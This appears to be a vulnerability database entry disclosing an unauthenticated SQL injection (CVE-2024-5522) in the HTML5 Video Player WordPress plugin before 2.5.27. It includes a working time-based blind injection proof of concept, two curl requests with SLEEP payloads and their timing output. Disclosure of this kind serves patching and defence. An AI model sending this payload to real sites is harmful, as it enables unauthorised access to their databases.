Lucene search
Mayank DeshmukhWPEX-ID:BC76EF95-A2A9-4185-8ED9-1059097A506AHistoryMay 30, 2024 - 12:00 a.m.
HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-05-3000:00:00
Mayank Deshmukh
12
html5 video player
version 2.5.27
unauthenticated
sql injection
security vulnerability
Description The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-"
{"code":"not_found","message":"Data not found","data":{"status":404}}curl 0.01s user 0.02s system 0% cpu 5.760 total
% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)--+-"
{"code":"not_found","message":"Data not found","data":{"status":404}}curl 0.01s user 0.01s system 1% cpu 1.204 totalRelated
wpvulndb
wpvulndb
HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-05-30 00:00:00
cve
cve
CVE-2024-5522
2024-06-20 06:15:10
nvd
nvd
CVE-2024-5522
2024-06-20 06:15:10
cvelist
cvelist
CVE-2024-5522 HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-06-20 06:00:04
vulnrichment
vulnrichment
CVE-2024-5522 HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-06-20 06:00:04
githubexploit
githubexploit
Exploit for CVE-2024-5522
2024-05-31 04:41:46
wordfence
wordfence
7.4 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:BC76EF95-A2A9-4185-8ED9-1059097A506A